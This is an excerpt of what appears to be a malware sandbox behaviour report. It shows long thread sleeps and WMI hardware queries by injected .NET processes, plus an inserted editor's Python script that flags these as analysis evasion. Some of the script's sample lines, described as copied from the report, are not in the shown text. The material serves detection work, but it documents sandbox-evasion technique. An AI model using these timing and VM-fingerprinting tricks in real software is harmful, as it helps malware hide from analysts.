                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99064s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98945s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98828s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98716s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98593s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8984 Thread sleep count: 3487 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98484s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98374s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98265s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98144s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98027s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -97901s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -97781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -97671s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -97561s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -97453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -97343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -97233s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -97125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -97015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -96906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -96796s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -96687s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -96578s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -96468s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -96359s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -96250s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -96140s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -96030s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -95921s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -95812s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -95702s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -95588s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99953s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99844s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99734s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99625s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99516s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99403s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99282s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99156s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -99046s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98938s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98813s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98688s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98563s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -98438s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe TID: 9040 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exe TID: 8204 Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
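                    The sleep and WMI evidence above reads as two evasion patterns working together: the injected .NET hosts (AddInProcess32.exe, jsc.exe, InstallUtil.exe, MSBuild.exe) stall with sleeps far beyond the report's 30000 threshold, including values around 922337203685477, and every one of them enumerates Win32_BaseBoard and Win32_Processor, the classes a hardware fingerprint for VM detection reads. The following Python script is an added example and not part of the Joe Sandbox report: it parses lines in this "Source: <process> <observation>" layout, aggregates per process how long and how often it slept and which WMI classes it touched, and flags the combination. Sample lines are copied from this section. Two interpretations are the editor's, not the report's: the 30000 threshold is reused for the "Thread delayed" lines, which carry none, and 922337203685477 is read as .NET TimeSpan.MaxValue expressed in milliseconds (2^63-1 ticks of 100 ns divided by 10000), that is, a thread parked for good. The regexes also accept the field-glued form ("...exeTID: 8372Thread sleep time") that flattened report exports sometimes produce.

```python
"""Summarise timing-evasion and hardware-fingerprinting evidence from
Joe Sandbox style "Source: <process> <observation>" behaviour lines."""
import re
from collections import defaultdict

# Sample input copied from the report section this example accompanies.
SAMPLE_LINES = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -96516s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 8372 Thread sleep time: -594000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8888 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8984 Thread sleep count: 6268 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe TID: 8956 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
""".strip().splitlines()

# Threshold the report applies in its ">= -30000s" comparisons. "Thread delayed"
# lines carry no threshold, so reusing it for them is an assumption.
DEFAULT_THRESHOLD_MS = 30000
# .NET TimeSpan.MaxValue in milliseconds: (2^63 - 1) ticks of 100 ns / 10000.
# A sleep this long parks the thread permanently rather than delaying it.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000
# WMI classes commonly read to fingerprint the platform (VM/sandbox detection).
ANTI_VM_CLASSES = {"Win32_BaseBoard", "Win32_Processor", "Win32_ComputerSystem", "Win32_BIOS"}

# \s* rather than \s+ between fields: flattened exports glue "…exeTID: 8372Thread…".
LINE_RE = re.compile(r"^Source:\s*(?P<path>.+?\.exe)\s*(?P<rest>.+)$")
SLEEP_RE = re.compile(r"TID:\s*(?P<tid>\d+)\s*Thread sleep time:\s*(?P<ms>-?\d+)s\s*>=\s*(?P<thr>-?\d+)s")
COUNT_RE = re.compile(r"TID:\s*(?P<tid>\d+)\s*Thread sleep count:\s*(?P<n>\d+)\s*>\s*(?P<thr>\d+)")
WMI_RE = re.compile(r"WMI Queries:\s*IWbemServices::(?P<method>\w+)\s*-\s*(?P<ns>\S+)\s*:\s*(?P<query>.+)")
DELAY_RE = re.compile(r"Thread delayed:\s*delay time:\s*(?P<ms>\d+)")
FROM_RE = re.compile(r"\bFROM\s+(\w+)", re.IGNORECASE)


def parse_line(line):
    """Turn one behaviour line into (process, kind, details), or None if not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    proc = m.group("path").rsplit("\\", 1)[-1]
    rest = m.group("rest")
    if s := SLEEP_RE.search(rest):
        # The report prints the relative NtDelayExecution interval as a negative.
        return proc, "sleep", {"tid": int(s["tid"]), "ms": abs(int(s["ms"])),
                               "threshold": abs(int(s["thr"]))}
    if c := COUNT_RE.search(rest):
        return proc, "sleep_loop", {"tid": int(c["tid"]), "count": int(c["n"]),
                                    "threshold": int(c["thr"])}
    if w := WMI_RE.search(rest):
        f = FROM_RE.search(w["query"])
        cls = f.group(1) if f else w["query"].strip()
        return proc, "wmi", {"method": w["method"], "namespace": w["ns"], "class": cls}
    if d := DELAY_RE.search(rest):
        return proc, "sleep", {"tid": None, "ms": int(d["ms"]), "threshold": DEFAULT_THRESHOLD_MS}
    if rest.startswith("Last function:"):
        return proc, "ended_delayed", {}
    return proc, "other", {"text": rest}


def summarise(lines):
    """Aggregate per process: sleep behaviour and WMI classes queried."""
    per_proc = defaultdict(lambda: {"long_sleeps": 0, "infinite_sleeps": 0,
                                    "max_sleep_ms": 0, "sleep_loops": 0,
                                    "ended_delayed": 0, "wmi_classes": set()})
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        proc, kind, d = parsed
        s = per_proc[proc]
        if kind == "sleep":
            s["max_sleep_ms"] = max(s["max_sleep_ms"], d["ms"])
            if d["ms"] >= TIMESPAN_MAX_MS:
                s["infinite_sleeps"] += 1
            elif d["ms"] >= d["threshold"]:
                s["long_sleeps"] += 1
        elif kind == "sleep_loop":
            s["sleep_loops"] += 1
        elif kind == "wmi":
            s["wmi_classes"].add(d["class"])
        elif kind == "ended_delayed":
            s["ended_delayed"] += 1
    return dict(per_proc)


def flag(summary):
    """Name the processes whose behaviour reads as analysis evasion, with reasons."""
    flagged = {}
    for proc, s in summary.items():
        reasons = []
        if s["infinite_sleeps"]:
            reasons.append("parks a thread indefinitely")
        if s["long_sleeps"]:
            reasons.append(f"{s['long_sleeps']} sleep(s) above threshold")
        if s["sleep_loops"]:
            reasons.append("short-sleep loop (stalling)")
        hw = sorted(s["wmi_classes"] & ANTI_VM_CLASSES)
        if hw:
            reasons.append("hardware fingerprinting via " + ", ".join(hw))
        if reasons:
            flagged[proc] = reasons
    return flagged


if __name__ == "__main__":
    for proc, reasons in flag(summarise(SAMPLE_LINES)).items():
        print(f"{proc}: " + "; ".join(reasons))
```

                    Run against a full report export, the per-process view is what matters: a process that both stalls and reads Win32_BaseBoard/Win32_Processor is doing the fingerprint-then-wait routine, whereas conhost.exe ending in a delay on its own is normal and is deliberately not flagged.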
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\svchost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 599453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595498
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595384
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 595016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594530
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594271
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 594126
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593856
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 593275
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 592584
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99871
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99609
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99336
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99087
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97299
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97138
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96763
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96636
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96524
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 96415
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95248
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 95140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94989
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 94640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 587093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99782
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99657
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99227
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 99016
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98782
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98657
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98380
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98251
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 98126
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97980
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97874
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97680
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 97376
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 600000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599647
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599532
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599293
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 599052
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598935
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 598563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99855
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99542
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99413
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99263
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99139
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 99029
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98907
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98188
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 98077
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 97965
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 97850
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 97731
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 97614
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 97490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 97350
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 97184
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 97068
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 96938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 96823
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 96672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 96546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 96385
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 96252
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 96120
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 96000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 95872
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 95759
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 95651
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 95528
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 95407
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 95297
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 95183
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 94986
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593306
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 593178
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Thread delayed: delay time: 100000
